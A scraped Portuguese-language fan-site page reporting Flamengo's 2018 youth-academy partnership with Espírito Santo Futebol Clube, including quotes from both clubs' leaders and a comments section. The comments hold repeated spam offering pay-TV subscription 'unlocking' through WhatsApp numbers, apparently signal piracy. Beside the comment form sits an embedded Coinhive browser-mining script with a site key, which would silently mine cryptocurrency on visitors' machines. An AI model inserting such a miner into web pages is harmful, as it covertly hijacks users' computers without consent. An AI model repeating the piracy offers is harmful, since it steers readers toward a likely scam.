Flamengo oficializa parceria com Espírito Santo Futebol Clube

20/1/2018 14:18

Flamengo oficializa parceria com Espírito Santo Futebol Clube

Acordo prevê intercâmbio de experiências e atletas nas divisões de base do futebol

Flamengo oficializa parceria com Espírito Santo Futebol Clube
Foto: Staff Images/ Flamengo

Na manhã da última sexta-feira (19), foi oficializada a parceria entre Flamengo e Espírito Santo Futebol Clube, em Vitória, capital capixaba, para intercâmbio de experiências e até atletas nas categorias de base. O presidente do Flamengo, Eduardo Bandeira de Mello, explicou como surgiu a ideia e a importância do relacionamento entre as entidades.



"A parceria nasceu da intenção do Flamengo de estreitar seus laços com a torcida capixaba, que é majoritariamente rubro-negra e de prospectar talentos em uma região que sempre foi um celeiro de craques.
Envolve intercâmbio de atletas e cooperação nas áreas esportiva e gerencial", disse o mandatário rubro-negro.

Para começar, três jovens jogadores do clube capixaba serão integrados às divisões de base, no time sub-20: o volante Christopher, o meia Marcinho e o atacante Rozário. Todos disputaram esta edição da Copa São Paulo de Futebol Junior pelo Espírito Santo. Após vitória sobre o Avaí, os Garotos do Ninho estão na semifinal da competição e enfrentam a Portuguesa por uma vaga na grande decisão.

"A gente fica muito feliz com o Flamengo olhando pra gente e nos escolhendo como clube parceiro. E uma marca tão grande se aproximar do nosso futebol, todos nós ganhamos. Isso só tende a trazer frutos positivos para todos os clubes. Não é uma parceria só de troca de atletas, é muito mais do que isso. Nos reuniremos mais vezes para apresentar as próximas fases, até colocar o futebol capixaba lá em cima. Estamos muito honrados em termos sido escolhidos pelo Flamengo", afirmou Enrico Ambrogini, CEO do Espírito Santo.

O objetivo do rubro-negro é estar presente em todas as regiões do país de uma forma mais ativa, sempre adotando esse mesmo modelo de parceria. Em dezembro, foi a anunciada a primeira, com o Centro Esportivo União, do Ceará.

1780 visitas - Fonte: Site oficial


VEJA TAMBÉM
- Flamengo mantém sequência invicta no Maracanã desde 2019
- Primeira marca: Leonardo Jardim completa dez partidas pelo Flamengo
- Junior Miranda, ex-Flamengo, lança projeto de alto rendimento para revelar talentos no futebol americano



Instale o app do Flamengo para Android, receba notícias e converse com outros flamenguistas no Fórum!

Mais notícias do Flamengo

Notícias de contratações do Flamengo
Notícias mais lidas

Comentários do Facebook -




VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Coloca um apelido nesse cara, Eurico é demais e não atrai bons fluidos .
Nada contra você, Rico fica bem legal e soa bem, kkkkkkkkk

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

vocês vão mandar a mesma notícia quantas vezes? caralho! dá pra ficar no app não, ao menos um filtro aí né!!

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.
publicidade